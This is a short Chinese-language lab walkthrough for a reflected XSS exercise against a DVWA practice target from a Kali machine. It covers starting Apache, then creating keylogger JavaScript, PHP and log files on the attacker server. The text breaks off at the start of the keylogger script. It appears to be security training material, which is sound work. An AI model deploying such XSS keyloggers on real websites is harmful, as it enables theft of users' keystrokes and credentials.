本实验以反射型xss漏洞为例
实验环境:kali 192.168.133.131
dvwa靶机 192.168.133.128
1、首先看起kali上的apache服务,命令:
/etc/init.d/apache2 start
2、在kali的浏览器输入:http://192.168.133.131 或 http://localhost 地址进行访问测试,检查apache是否开启成功
3、 进入kali的/var/www/html路径创建三个文件
Keylogger.js Keylogger.php Keylog.txt
(1)keylogger.js[js脚本文件]
document.onkeypress = function(evt) {
evt